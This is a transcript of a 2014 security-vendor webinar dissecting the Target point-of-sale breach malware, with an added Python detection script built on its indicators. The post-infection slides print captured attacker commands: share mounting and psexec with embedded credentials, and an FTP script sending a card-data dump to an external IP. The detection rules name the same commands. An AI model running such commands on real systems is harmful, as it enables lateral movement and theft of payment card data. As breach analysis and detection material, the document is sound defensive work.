The Target Breach: Anatomy of an Attack
Transcript of The Target Breach: Anatomy of an Attack
> www.alertlogic.com
The Target Data Breach: Anatomy of an Attack
Stephen Coty, Director, Threat Research
Diane Garey, Product Marketing
February 4, 2014
Today
Agenda
• What’s in the News
• About POS Malware
• How the Malware Works
• How to Protect Yourself
Logistics
• Ask a question anytime using the “Question Box”
• Look for slides on the Alert Logic SlideShare account
• You’ll get an email with a link to today’s recording
• Live Tweet today’s event: #AlertLogic_ACID
30 Days of the Target Breach
Timeline markers: Dec 18th, Jan 10th, Jan 15th, Jan 17th
You Never Want to Send This Communication
What’s Being Reported
About the Attack
• Malicious software infects POS systems and sends credit card data via FTP
• Possibly home grown POS system running Windows OS
• Malware traced to Russia & sold to 60 European cyber criminals
About the Impact
• 110 million customers affected
• Data being sold on the underground market
• Eight other retailers have been compromised
• Arrests being made on people using the cards
Malware for Sale
• Went into testing Feb 12, 2013 under the title: “Dump CC memory grabber (pos-trojan)”
• Underground community laughed at the outrageous price
• Currently not being sold due to Ree[4] selling out buyers
Budget Version
• Implemented by sending over the FTP protocol
• Log is not encrypted
• 1st updated edition free
• Rebuild product 200 $ (max 3)
• No support
• $1800
Economy Version
• Implemented by sending over the FTP protocol
• Log encrypted with a cipher invented by us
• Free updates for 3 months. Rebuild 100 $ (max 5)
• Support
• $2000
Full Version
• Shipping through the gate
• Log encrypted with a cipher invented by us
• Free updates for life. Rebuild further by $100
• $2300
More Malware Sales Details
• License agreement (translated from Russian):
  “You use the program on your own risk and creators assume no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version.”
• Seller Information
  – E-mail 1: [email protected]
  – E-mail 2: [email protected]
  – ICQ: 565033
  – Skype: s.r.a.ree4
Stolen Credit Cards are Selling for $15-60
Recent dumps: ~$15-60 range
Initial dumps: ~$12 average
How the Malware (Kaptoxa-Rescator) Works
Infects POS System
• dum.exe executes mmon.exe
Scrapes memory
• Scrapes tracks 1 & 2 from credit card data
Saves data
• To a default .dll file
Establishes share
• net.exe/net1.exe creates a Windows share
Stores and forwards data
• To an internal server as a txt file; that server sends the data to an external FTP server controlled by the attackers
Disables firewall
• Creates an autorun entry to launch at boot
Normal POS Activity: Pre-Infection
Post-Infection Activity: Step 1
• New service
Post-Infection Activity: Step 1.1
• Looks like a regular user
• Starts POSWDS
Post-Infection Activity: Step 1.2
Filtering for commands (commands that were issued and captured in the malware analysis):
  cmd.exe /c move C:\WINDOWS\system32\net.EXE
  net start POSWDS
  C:\WINDOWS\system32\cmd.exe /c net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$
• net.exe: establishes the Windows share
Post-Infection Activity: Step 2
BackDoor-FBPL takes the following actions:
  Step 1: C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F"
  Step 2: c:\windows\system32\cmd.exe /c psexec /accepteula \10.116.240.3 -u ttcopscli3acs\Best1_user -p BackupU$r cmd -d bladelogic
BackDoor-FBPL sleeps until the predetermined times of 10:00am and 5:00pm, then runs:
  Step 1: C:\WINDOWS\system32\cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt (the file name is built from the system date and time)
BMC Whitepaper
Post-Infection Activity: Step 2 continued
Step 2: Write data to a text file (cmd.txt):
  open 199.188.204.182
  digitalw
  Crysis1089
  cd etc
  cd bin
  send C:\data_2014_1_20_17_53.txt
  quit
Step 3: Command line:
  c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt > c:\xxxxx\xxxxx\temp\cmd.txt
Theory: How the Malware was Delivered
Ariba Vendor Portal
Theory: How the Malware was Delivered
Login to Portal
Theory: How the Malware was Injected
NCR POS Terminals
Evolution of Target POS Malware
• Memory Dumper: copy a specific process in memory
• DexterPOS: steals the process list from an infected machine while parsing memory dumps
• VSkimmer: detect card readers, grab information, send data to a control server
• AlinaPOS: v1 created; v2 encryption; v2.1 logging; v3.2 & 5.2 exfiltration
• BlackPOS / Kaptoxa / Rescator
Timeline markers: 2008, 2010, 2012, 2013
Kaptoxa & Others Originated from Dexter
• Dexter:
  – Able to read process memory from infected machines
  – Parses memory dumps looking for track 1 & 2 of the credit card data
• Infected POS systems in 40 countries
  – 42% of the systems infected were in NA
  – 19% in the UK
• Targeted Windows OS
How to Mitigate Risk
• Scan POS systems with your choice of antivirus
• Check for the removal of autorun keys
  – HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value "svchit"
• Check for removal of three executables
  – %USERPROFILE%/svchst.exe
  – Dum.exe
  – Mmon.exe
• Disable outbound FTP access from the POS system at the network level rather than on the host itself
• Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACLs)
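As an added illustration that is not part of the Alert Logic deck, the Python below turns the captured command lines from the post-infection steps and the executable names from the mitigation checklist into detection rules and runs them over constructed process-creation log lines. The log format, the timestamps and the host name are assumptions; the command lines themselves are the ones shown in the slides.

```python
import re

# Constructed sample of process-creation events in a hypothetical "<time> <host> <image> | <command line>"
# format (not a real EDR export). Command lines reproduce those captured in the slides; times/host are made up.
SAMPLE_LOG = r"""
2014-01-20T17:53:01 pos-lane-07 cmd.exe | C:\WINDOWS\system32\cmd.exe /c net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$
2014-01-20T17:53:02 pos-lane-07 net.exe | net start POSWDS
2014-01-20T17:53:05 pos-lane-07 cmd.exe | C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F"
2014-01-20T17:53:09 pos-lane-07 cmd.exe | C:\WINDOWS\system32\cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt
2014-01-20T17:53:12 pos-lane-07 cmd.exe | c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt
2014-01-20T17:54:00 pos-lane-07 mmon.exe | C:\Documents and Settings\pos\mmon.exe
2014-01-20T18:00:00 pos-lane-07 explorer.exe | C:\WINDOWS\explorer.exe
"""
# Command-line patterns derived from the post-infection steps shown in the deck.
RULES = [
    ("admin_share_mount_with_creds", re.compile(r"net\s+use\s+\S+\s+\\\\[\d.]+\\c\$.*?/user:", re.I)),
    ("poswds_service_start", re.compile(r"net\s+start\s+POSWDS\b", re.I)),
    ("psexec_kills_bladelogic", re.compile(r"psexec\b.*taskkill\s+/IM\s+bladelogic\.exe", re.I)),
    ("dump_moved_to_dated_txt", re.compile(r"\bmove\s+\\\\.*twain_32a\.dll\s+\S*data_\d{4}(_\d{1,2}){4}\.txt", re.I)),
    ("scripted_ftp_transfer", re.compile(r"\bftp\s+-s:", re.I)),
]
# Executable names the mitigation slide says to look for on the host.
KNOWN_IMAGES = {"svchst.exe", "dum.exe", "mmon.exe"}

def parse_event(line):
    """Split one log line into fields; return None for blank or malformed lines."""
    if " | " not in line:
        return None
    head, cmdline = line.split(" | ", 1)
    parts = head.split(None, 2)
    if len(parts) != 3:
        return None
    return {"ts": parts[0], "host": parts[1], "image": parts[2], "cmdline": cmdline.strip()}

def scan(log_text):
    """Return one finding per (event, rule) hit; a single event may trigger several rules."""
    findings = []
    for raw in log_text.splitlines():
        ev = parse_event(raw.strip())
        if ev is None:
            continue
        if ev["image"].lower() in KNOWN_IMAGES:
            findings.append(dict(ev, rule="known_malware_image"))
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append(dict(ev, rule=name))
    return findings
```

Calling scan(SAMPLE_LOG) returns six findings, one per malicious line, and nothing for the explorer.exe event; in practice the rules would be fed from an EDR or SIEM process-creation feed rather than an embedded string.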
Contact us for a copy of our Malware Analysis Report
Credits to the Sources of Data
• http://www.alertlogic.com/data-breach-at-target-exposes-40-million-credit-cards/
• http://www.seculert.com/blog/2012/12/dexter-draining-blood-out-of-point-of-sales.html
• http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/
• http://www.cyphort.com/blog/cyphort-tracks-down-new-variants-of-target-malware/
• http://www.tripwire.com/state-of-security/vulnerability-management/targets-point-sale-system-compromised/
Join Tomorrow’s Webinar: Delivering Real Protection: Alert Logic Security-as-a-Service
• http://alrt.co/ThreatLogDemo
• Fully managed intrusion detection and log management
• Deploy anywhere your datacenter is located
Thank you!
To Follow our Research:
#AlertLogic_ACID
http://www.alertlogic.com/resources/blog/
[email protected] -> “Malware Analysis Report”